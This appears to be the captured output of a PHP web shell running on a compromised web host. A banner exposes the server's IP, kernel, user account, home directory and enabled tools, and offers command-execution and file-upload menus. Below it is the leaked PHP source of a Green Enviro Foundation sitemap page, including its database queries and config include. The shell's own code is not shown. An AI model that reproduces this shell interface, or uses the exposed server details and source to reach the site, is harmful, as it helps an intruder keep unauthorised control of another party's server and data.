Server IP : 103.53.40.154 / Your IP : 3.142.171.100 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/greenenvirofoundation.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $sqlab = "SELECT * FROM `tbl_about` WHERE a_id=1"; $runab = mysqli_query($db,$sqlab) or die("Query Not run"); $datab = mysqli_fetch_assoc($runab); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <?php include'top-links.php'?> <title>Sitemap | Green Enviro Foundation</title> <meta name="description" content="Sitemap | Green Enviro Foundation"> <style> </style> </head> <body> <?php include 'header.php'?> <main> <section class="page-banner bg-image pt-50 pb-50" style="background-image: linear-gradient(rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0.5)), url(assets/img/green-blk.jpg);"> <div class="container"> <h2 class="wow fadeInUp" data-wow-duration="1.2s" data-wow-delay=".2s">Sitemap</h2> <div class="breadcrumb-list wow fadeInUp" data-wow-duration="1.4s" data-wow-delay=".4s"> <a href="<?php echo $wspath?>">Home :</a> <span class="primary-color">Sitemap </span> </div> </div> </section> <section class="pt-50 pb-20"> <div class="container "> <div class="text-center"> <h3> Useful Links </h3> </div> <div class="row"> <div class="col-xl-3 col-lg-3"> <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath?>">Home</a> </div> <div class="col-xl-3 col-lg-3"> <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath?>about.html">About Us</a> </div> <div class="col-xl-3 col-lg-3"> <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath?>events.html">Events</a> </div> <div class="col-xl-3 col-lg-3"> <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath?>contact.html">Contact Us</a> </div> <div class="col-xl-3 col-lg-3"> <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath?>contact.html">Sitemap</a> </div> </div> <div class="text-center"> <h3> Events </h3> </div> <div class="row"> <?php $sqltype = "SELECT * FROM `tbl_services`"; $runtype = mysqli_query($db,$sqltype) or die("Query Not run"); while($datatype = mysqli_fetch_assoc($runtype)){ ?> <div class="col-xl-3 col-lg-3"> <i class="fa fa-fighter-jet" aria-hidden="true"></i> <a href="<?php echo $wspath?><?php echo $datatype['url_link']?>.html"><?php echo $datatype['property_name']?></a> </div> <?php }?> </div> </div> </section> <?php //include 'home-team.php'?> </main> <?php include 'footer.php'?> </body> </html>